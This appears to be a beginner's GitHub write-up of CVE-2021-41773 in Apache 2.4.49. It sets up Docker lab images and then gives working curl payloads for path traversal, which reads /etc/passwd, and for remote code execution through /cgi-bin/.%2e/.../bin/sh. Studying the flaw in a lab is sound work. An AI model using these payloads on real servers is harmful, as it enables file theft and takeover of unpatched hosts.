来源

关联漏洞

描述

CVE-2021-41773

介绍

# CVE-2021-41773

Hello guys, yesterday The new CVE-2021-41773 for apache 2.4.49 verison is released. So in this case, i want to explain about this apache vulnerability.

# Playground
So, I think you guys want to test this vulnerability in website. So i have a playground place for you guys.
This is the website to download docker image of example apache 2.4.49 [Docker Image](https://hub.docker.com/r/blueteamsteve/cve-2021-41773/tags)

Note: there is two Image that `with-cgid` and `no-cgid`. You need to download both images

# Usage
First download the `docker image` in your machine. 

# Pull Docker Images
```
no-cgid: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
```

# Run Image
```
no-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
```
# Disclaimer
Honestly, I didn't know how he thought to found this vulnerability. So i can't explain fully about this. But I will try my best to talk about all what i understand for this CVE. 

# Vulnerability
This CVE is little interesting because it have two vulnerability. They are `LFD`**Local file disclosure** and `RCE` **Remote Code Execution**. Cool!. So, In this post I will explain about both vulnerability for this CVE. 

# Local-file-disclosure (use **no-cgi** docker image)
So, let start with **Local file disclosure** vulnerability. If you are familiar with apache, you can note that `cgi-bin`(Common Gateway Interface)  is the default path to defines a way for a web server to interact with external content-generating programs in apache-2.4.49

But This is path is `Forbidden` for everyone and even for admin. Hmm, that interesting Right?

And if you familiar with **Local file disclosure** vulnerability, you might know that most of `LFD` vulnerability is happen in forbidden paths. 

So let test LFI simple payloads in the `/cgi-bin/` path.  

I put `../../../../../` before `/etc/paswd`.
(**If you want to know what is `../` check out this blog post[Local file disclosure bypass](https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion)**)



With curl:
```
curl http://localhost:8080/cgi-bin/../../../../../etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-41-37.png)

With burpsuite:
![burpsuite](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-55-53.jpg)

As you can see we got error with this simple payload. In curl we got `404` status code `Not Found` error and in Burp, we got `400 Bad Request` error. 

So that Mean, we should encode our payload to `URL` encoding. So let try it and see what we will get.

So I encode the  `.` to Url.   **Note: `.` is `%2E` and aslo `%2e` in url encoding.**

With curl:
```
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-14-44.png)

With Burp:
![Burp](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-23-07.png)

Yes!. Our payload worked now. We can read the `/etc/passwd` of website. 

So I hope now you understood about `LFD` Vulnerability of this CVE. So, let continue to the `RCE` Vulnerability of this apache 2.4.49 CVE.

# Remote-Code-Execution (use **with-cgi** docker image)
To explain about the RCE Vulnerability of this CVE, you need to understand about some basics of `RCE` and `linux basics`. 

**Check out this blog post to know [What is RCE](https://www.n-able.com/blog/remote-code-execution)**

Ah, i think you thought that i talk wrongly that i said need `linux basics`. Nope. I didn't say wrong because We actually need it. So let begin!

First let me show the working payload and I will explain how it worked. 
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;whoami'
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
With Curl:
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-42-23.png)

# Payload-Explain
So Let me explain about this payload.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
As you can see the path **`/cgi-bin/`** and encoding **`.%2e`** is same. But There are more two options now. It was `-d` **data** and `/bin/sh` **/bin/bash**.  So, Let me explain why we need to put these.

# /Bin/Bash
First, we want to get remote-code-excution Right?. 

So as you know that in linux based systems `/bin/bash` is the main part to excute and type commands and shells. So We need the `bash` to excute our commands in web server. Check out this[What is Bash in linux](https://opensource.com/resources/what-bash).

# Data
Okay now, let say that we can get `/bin/sh`. We only need to inject our commands. We can put our injection as a data with curl. 

So Our payload is `C|echo;id`. Let me explain what is this.

So `C` is nothing. We can put anything we want before the `|`. like `Comdey|`. 

The `echo;id` is just linux trick.**So, i said that need linux basics**  [Echo basics](https://www.youtube.com/watch?v=tYmFsyH7VJY)

If we put these together we got RCE in apache 2.4.49.

# Thanks!
Thanks For reading guys. This is my first writeup for CVES. Forgive me if i was bad at explaing at this. And also please give me suggestion.

![Gif](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2005-16-30.jpg)

文件快照

 [4.0K]  /data/pocs/cc65bebcd975d4e92e9b1c2ccb838dfeccf1d2c5
├── [4.0K]  images
│   ├── [ 50K]  Screenshot from 2021-10-08 03-41-37.png
│   ├── [331K]  Screenshot from 2021-10-08 03-55-53.jpg
│   ├── [126K]  Screenshot from 2021-10-08 04-14-44.png
│   ├── [195K]  Screenshot from 2021-10-08 04-23-07.png
│   ├── [ 52K]  Screenshot from 2021-10-08 04-42-23.png
│   └── [150K]  Screenshot from 2021-10-08 05-16-30.jpg
└── [5.5K]  README.md

1 directory, 7 files

备注